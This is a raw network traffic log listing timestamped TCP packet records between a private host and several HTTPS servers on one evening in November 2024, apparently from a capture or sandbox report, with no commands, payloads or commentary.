                                                                                                                                      Nov 29, 2024 23:10:26.115246058 CET49760443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:26.117863894 CET49760443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:26.117911100 CET44349760172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:26.135970116 CET49764443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:26.135998964 CET44349764172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:26.136059999 CET49764443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:26.136344910 CET49764443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:26.136357069 CET44349764172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:26.517200947 CET44349762172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:26.517296076 CET44349762172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:26.517379999 CET49762443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:26.522341013 CET49762443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:26.522372007 CET44349762172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:26.805205107 CET44349763172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:26.805278063 CET44349763172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:26.805358887 CET49763443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:26.805545092 CET49763443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:26.805557013 CET44349763172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:26.805579901 CET49763443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:26.805584908 CET44349763172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:26.883944035 CET49765443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:26.883970022 CET44349765172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:26.884120941 CET49765443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:26.884388924 CET49765443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:26.884399891 CET44349765172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:26.886394024 CET49766443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:26.886411905 CET44349766172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:26.886466026 CET49766443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:26.886766911 CET49766443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:26.886776924 CET44349766172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:27.398808002 CET44349764172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:27.399010897 CET49764443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:27.400084972 CET49764443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:27.400093079 CET44349764172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:27.400291920 CET44349764172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:27.408749104 CET49764443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:27.408778906 CET49764443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:27.408807993 CET44349764172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:28.118835926 CET44349766172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:28.118931055 CET49766443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:28.120105028 CET49766443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:28.120111942 CET44349766172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:28.120311975 CET44349766172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:28.121571064 CET49766443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:28.121613979 CET49766443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:28.121632099 CET44349766172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:28.155999899 CET44349765172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:28.156075954 CET49765443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:28.157064915 CET49765443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:28.157074928 CET44349765172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:28.157269001 CET44349765172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:28.163011074 CET49765443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:28.163155079 CET49765443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:28.163180113 CET44349765172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:28.163260937 CET49765443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:28.163268089 CET44349765172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:28.257510900 CET44349764172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:28.257585049 CET44349764172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:28.257747889 CET49764443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:28.257819891 CET49764443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:28.257829905 CET44349764172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:28.257842064 CET49764443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:28.257846117 CET44349764172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:28.798841953 CET44349766172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:28.798894882 CET44349766172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:28.799006939 CET44349766172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:28.799041033 CET44349766172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:28.799074888 CET44349766172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:28.799192905 CET49766443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:28.799192905 CET49766443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:28.799204111 CET44349766172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:28.801685095 CET49766443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:28.807183027 CET44349766172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:28.815485001 CET44349766172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:28.815589905 CET44349766172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:28.815742016 CET49766443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:28.815752029 CET44349766172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:28.815797091 CET49766443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:28.823846102 CET44349766172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:28.872208118 CET49766443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:28.918832064 CET44349766172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:28.972716093 CET49766443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:28.972722054 CET44349766172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:28.990878105 CET44349766172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:28.990950108 CET44349766172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:28.991108894 CET49766443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:29.031481981 CET49766443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:29.031490088 CET44349766172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:29.031501055 CET49766443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:29.031505108 CET44349766172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:29.405507088 CET44349765172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:29.405589104 CET44349765172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:29.405774117 CET49765443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:29.405951023 CET49765443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:29.405967951 CET44349765172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:29.723861933 CET49767443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:29.723901033 CET44349767172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:29.723978043 CET49767443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:29.725240946 CET49767443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:29.725254059 CET44349767172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:29.849040985 CET49768443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:29.849086046 CET44349768172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:29.849153042 CET49768443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:29.849529982 CET49768443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:29.849545002 CET44349768172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:30.938450098 CET44349767172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:30.938533068 CET49767443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:30.939815998 CET49767443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:30.939831018 CET44349767172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:30.940028906 CET44349767172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:30.941154957 CET49767443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:30.941246033 CET49767443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:30.941251040 CET44349767172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:31.156232119 CET44349768172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:31.156342983 CET49768443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:31.157423973 CET49768443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:31.157437086 CET44349768172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:31.157638073 CET44349768172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:31.158807993 CET49768443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:31.158910036 CET49768443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:31.158945084 CET44349768172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:31.159806013 CET49768443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:31.159815073 CET44349768172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:32.057749987 CET44349767172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:32.057856083 CET44349767172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:32.057904005 CET49767443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:32.057965040 CET49767443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:32.057980061 CET44349767172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:32.200587988 CET44349768172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:32.200666904 CET44349768172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:32.200711012 CET49768443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:32.200862885 CET49768443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:32.200879097 CET44349768172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:32.354221106 CET49770443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:32.354250908 CET44349770172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:32.354310036 CET49770443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:32.354721069 CET49770443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:32.354737043 CET44349770172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:32.416254997 CET49771443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:32.416275978 CET44349771172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:32.416361094 CET49771443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:32.416625023 CET49771443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:32.416634083 CET44349771172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:33.636681080 CET44349770172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:33.638020039 CET49770443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:33.638391972 CET49770443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:33.638406992 CET44349770172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:33.638735056 CET44349770172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:33.640347958 CET49770443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:33.640450001 CET49770443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:33.640450001 CET49770443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:33.640492916 CET44349770172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:33.778317928 CET44349771172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:33.778393984 CET49771443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:33.779575109 CET49771443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:33.779580116 CET44349771172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:33.779812098 CET44349771172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:33.784806013 CET49771443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:33.785226107 CET49771443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:33.785255909 CET44349771172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:33.785361052 CET49771443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:33.785388947 CET44349771172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:33.785485983 CET49771443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:33.785525084 CET44349771172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:33.787878990 CET49771443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:33.787908077 CET44349771172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:33.790270090 CET49771443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:33.790287971 CET44349771172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:33.790425062 CET49771443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:33.790458918 CET44349771172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:33.790468931 CET49771443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:33.790472984 CET44349771172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:33.790584087 CET49771443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:33.790605068 CET44349771172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:34.659902096 CET44349770172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:34.659986019 CET44349770172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:34.660036087 CET49770443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:34.660284042 CET49770443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:34.660299063 CET44349770172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:34.885776043 CET49772443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:34.885818958 CET44349772172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:34.885879040 CET49772443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:34.886204004 CET49772443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:34.886219978 CET44349772172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:35.839574099 CET44349771172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:35.839658976 CET44349771172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:35.839735031 CET49771443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:35.839894056 CET49771443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:35.839904070 CET44349771172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:35.900887966 CET49773443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:35.900918961 CET44349773172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:35.901042938 CET49773443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:35.901251078 CET49773443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:35.901262999 CET44349773172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:36.148013115 CET44349772172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:36.148117065 CET49772443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:36.149318933 CET49772443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:36.149333000 CET44349772172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:36.149535894 CET44349772172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:36.152766943 CET49772443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:36.152899981 CET49772443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:36.152930975 CET44349772172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:36.153012991 CET49772443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:36.153023005 CET44349772172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:36.424088001 CET49773443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:37.203993082 CET44349772172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:37.204090118 CET44349772172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:37.204139948 CET49772443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:37.204400063 CET49772443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:37.204418898 CET44349772172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:37.868356943 CET49774443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:37.868410110 CET44349774172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:37.868499041 CET49774443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:37.868797064 CET49774443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:37.868813038 CET44349774172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:39.127391100 CET44349774172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:39.127475977 CET49774443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:39.128678083 CET49774443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:39.128690004 CET44349774172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:39.128895998 CET44349774172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:39.130032063 CET49774443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:39.130129099 CET49774443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:39.130136013 CET44349774172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:39.971553087 CET44349774172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:39.971631050 CET44349774172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:39.971744061 CET49774443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:39.971848011 CET49774443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:39.971873999 CET44349774172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:40.342242002 CET49775443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:40.342272997 CET44349775172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:40.342447996 CET49775443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:40.342658997 CET49775443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:40.342672110 CET44349775172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:41.684967041 CET44349775172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:41.685040951 CET49775443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:41.686238050 CET49775443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:41.686244965 CET44349775172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:41.686440945 CET44349775172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:41.687599897 CET49775443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:41.688050985 CET49775443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:41.688086033 CET44349775172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:41.688180923 CET49775443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:41.688204050 CET44349775172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:41.688307047 CET49775443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:41.688330889 CET44349775172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:41.688448906 CET49775443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:41.688472986 CET44349775172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:41.688600063 CET49775443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:41.688631058 CET44349775172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:41.688795090 CET49775443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:41.688826084 CET44349775172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:41.688851118 CET49775443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:41.688863039 CET44349775172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:41.688961983 CET49775443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:41.688982010 CET44349775172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:43.782030106 CET44349775172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:43.782103062 CET44349775172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:43.782207012 CET49775443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:43.782310009 CET49775443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:43.782322884 CET44349775172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:43.799741983 CET49776443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:43.799765110 CET44349776172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:43.799846888 CET49776443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:43.800148010 CET49776443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:43.800157070 CET44349776172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:44.581063032 CET49776443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:56.256241083 CET49777443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:56.256269932 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:56.256345034 CET49777443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:56.256630898 CET49777443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:56.256644011 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:56.801389933 CET49778443192.168.2.420.109.210.53
                                                                                                                                      Nov 29, 2024 23:10:56.801430941 CET4434977820.109.210.53192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:56.801490068 CET49778443192.168.2.420.109.210.53
                                                                                                                                      Nov 29, 2024 23:10:56.801896095 CET49778443192.168.2.420.109.210.53
                                                                                                                                      Nov 29, 2024 23:10:56.801911116 CET4434977820.109.210.53192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:58.059458017 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:58.059559107 CET49777443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:58.063180923 CET49777443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:58.063189030 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:58.063395977 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:58.073798895 CET49777443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:58.119333982 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:58.547880888 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:58.547903061 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:58.547924042 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:58.548054934 CET49777443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:58.548072100 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:58.548120022 CET49777443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:58.579796076 CET4434977820.109.210.53192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:58.579993010 CET49778443192.168.2.420.109.210.53
                                                                                                                                      Nov 29, 2024 23:10:58.581554890 CET49778443192.168.2.420.109.210.53
                                                                                                                                      Nov 29, 2024 23:10:58.581567049 CET4434977820.109.210.53192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:58.581768990 CET4434977820.109.210.53192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:58.589530945 CET49778443192.168.2.420.109.210.53
                                                                                                                                      Nov 29, 2024 23:10:58.635345936 CET4434977820.109.210.53192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:58.741363049 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:58.741383076 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:58.741568089 CET49777443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:58.741584063 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:58.741631031 CET49777443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:58.791187048 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:58.791203022 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:58.791285992 CET49777443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:58.791294098 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:58.791340113 CET49777443192.168.2.413.107.246.63
